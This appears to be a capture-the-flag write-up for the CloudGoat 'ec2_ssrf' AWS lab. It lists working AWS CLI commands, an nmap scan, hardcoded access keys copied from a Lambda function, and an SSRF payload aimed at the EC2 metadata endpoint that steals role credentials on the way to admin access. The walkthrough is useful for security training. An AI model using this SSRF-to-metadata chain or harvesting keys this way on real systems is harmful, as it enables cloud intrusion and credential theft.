Oct 21, 2022
Cloudgoat AWS CTF solution- Scenerio 6 (ec2_ssrf)
Scenario: ec2_ssrf
Deployment:
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py create ec2_ssrf
~/.aws/credentials
Add then add secrets to “/root/.aws/credentials” file with profile name “solus”
Scenario Resources
- 1 VPC with:
- EC2 x 1
- 1 Lambda Function
- 1 S3 Bucket
Scenario Start(s)
- IAM User “Solus”
Scenario Goal(s)
Invoke the “cg-lambda-[ CloudGoat ID ]” Lambda function.
Summary
Starting as the IAM user Solus, the attacker discovers they have ReadOnly permissions to a Lambda function, where hardcoded secrets lead them to an EC2 instance running a web application that is vulnerable to server-side request forgery (SSRF). After exploiting the vulnerable app and acquiring keys from the EC2 metadata service, the attacker gains access to a private S3 bucket with a set of keys that allow them to invoke the Lambda function and complete the scenario.
Exploitation Route(s)
Route Walkthrough — IAM User “Solus”
ec2 public IP: 54.198.199.238
- As the IAM user Solus, the attacker explores the AWS environment and discovers they can list Lambda functions in the account.
2. Listing lambda functions
aws lambda list-functions --profile solus
“arn:aws:lambda:us-east-1:864154101007:function:cg-lambda-ec2_ssrf_cgiddzghpaob13” running with role “arn:aws:iam::864154101007:role/cg-lambda-role-ec2_ssrf_cgiddzghpaob13-service-role”
3. We have found 2 environment variables in lambda fucntion-
"EC2_ACCESS_KEY_ID": "AKIA4SM4ZEUHQLXA376S",
"EC2_SECRET_KEY_ID": "HY/SFYuq8YOC1iFS3vSHv/+jvkEvF1pIUyta31Ga"4. Within a Lambda function, the attacker finds AWS access keys belonging to a different user — the IAM user Wrex.
5. Now operating as Wrex, once again we enumerated current users’ (“wrex”) permissions-
6. The attacker discovers an EC2 instance running a web application vulnerable to an SSRF vulnerability.
a) Finding running ec2 instances.
Public IP: 54.242.29.73
aws ec2 describe-instances --region us-east-1 --profile ec2_env_varb) Finding open TCP ports on ec2 accessible from internet-
nmap -Pn --disable-arp-ping -vv -sS -p- -T5 54.242.29.73c) Upon doing content discovery and parameter fuzzing we found a valid “GET” parameter named “url”.
7. Exploiting the SSRF vulnerability via the ?url=... parameter, the attacker is able to steal AWS keys from the EC2 metadata service.
http://54.242.29.73/?url=169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-ec2_ssrf_cgiddzghpaob138. Now using the keys from the EC2 instance, the attacker finds a private S3 bucket containing another set of AWS credentials for a more powerful user: Shepard.
a) Enumerating permissions of new aws creds found via ssrf-
b) Finding s3 buckets and listing contents-
aws s3 ls --profile ec2_role
aws s3 ls s3://cg-secret-s3-bucket-ec2-ssrf-cgiddzghpaob13 --profile ec2_rolec) Testing the new creds-
9. Now operating as Shepard, with full-admin final privileges, the attacker can invoke the original Lambda function to complete the scenario.
aws lambda invoke --function-name cg-lambda-ec2_ssrf_cgiddzghpaob13 output.txt --region us-east-1 --profile admin-userReferences:
https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/ec2_ssrf/README.md
